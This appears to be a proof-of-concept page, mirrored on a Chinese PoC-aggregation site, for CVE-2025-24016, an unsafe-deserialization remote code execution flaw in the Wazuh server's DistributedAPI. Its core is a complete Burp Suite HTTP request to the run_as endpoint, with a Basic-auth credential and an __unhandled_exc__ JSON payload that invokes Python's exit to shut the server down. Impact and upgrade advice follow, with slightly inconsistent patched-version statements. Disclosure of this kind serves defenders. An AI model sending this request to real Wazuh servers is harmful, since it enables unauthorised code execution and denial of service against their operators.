关联漏洞
标题:
Wazuh服务器远程代码执行漏洞
(CVE-2025-24016)
描述:Wazuh是一款用于威胁预防、检测和响应的免费开源平台。在版本4.4.0至4.9.1之间的Wazuh服务器中,存在一个不安全的反序列化漏洞,允许远程代码执行。DistributedAPI参数被序列化为JSON,并通过`as_wazuh_object`(位于`framework/wazuh/core/cluster/common.py`)进行反序列化。如果攻击者成功在DAPI请求/响应中注入未经检查的字典,他们可以伪造一个未处理的异常(`__unhandled_exc__`),从而执行任意Python代码。该漏洞可以通过任何拥有API访问权限的人(被攻破的控制台或集群中的Wazuh服务器)触发,在某些配置下,甚至可以通过被攻破的代理触发。版本4.9.1中已经修复了该漏洞。
描述
CVE-2025-24016: RCE in Wazuh server! Remote Code Execution
介绍
# Wazuh Remote Code Execution (RCE) - PoC
## Vulnerability Overview
This repository demonstrates the remote code execution (RCE) vulnerability in the Wazuh server, introduced by an unsafe deserialization in the `wazuh-manager` package. The vulnerability allows remote attackers with API access (compromised dashboard, Wazuh servers in the cluster, or certain configurations with compromised agents) to execute arbitrary code on the server.
### Affected Versions
- `wazuh-manager` version `>= 4.4.0`
- Patched in version `>= 4.9.1`
### Description
The vulnerability occurs in the Wazuh API, where parameters in the `DistributedAPI` are serialized as JSON and deserialized using `as_wazuh_object` in the `framework/wazuh/core/cluster/common.py` file. An attacker can exploit this vulnerability by injecting an unsanitized dictionary into DAPI requests, which may lead to the evaluation of arbitrary Python code.
The RCE can be triggered using the `run_as` endpoint, which allows the attacker to control the `auth_context` argument. By crafting a malicious request, arbitrary code can be executed on the master server.
### Proof of Concept
To trigger this vulnerability using the server API, follow the steps below.
### PoC Burp Suite Request
1. **Burp Suite Request to Trigger the Vulnerability**:
```http
POST /security/user/authenticate/run_as HTTP/1.1
Host: target.com:55000
Cache-Control: max-age=0
Accept-Language: en-US
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.183 Safari/537.36
Accept: application/json
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Authorization: Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg== # Base64-encoded "wazuh-wui:MyS3cr37P450r.*-"
Content-Type: application/json
Content-Length: 83
{
"__unhandled_exc__": {
"__class__": "exit",
"__args__": []
}
}
```
2. **Explanation of Request**:
- **Authorization Header**: This is the base64-encoded authorization (`wazuh-wui:MyS3cr37P450r.*-`).
- **Payload**: The malicious payload contains the unsanitized exception `__unhandled_exc__` which triggers the execution of arbitrary Python code (`exit` in this case).
### Impact
- **Remote Code Execution (RCE)**: This vulnerability allows attackers to execute arbitrary code on the Wazuh server, affecting versions `>= 4.4.0` up to `4.9.0` (not patched yet).
- **Potential Denial of Service**: In this PoC, the `exit` function is triggered, causing the Wazuh server to shut down.
## Mitigation
To protect your systems, upgrade to `Wazuh` version `>= 4.9.1` where this issue is patched.
文件快照
[4.0K] /data/pocs/5a14687ca3e84da12d469b0b3cc29f94f0b06592
├── [306K] rce.png
└── [2.6K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。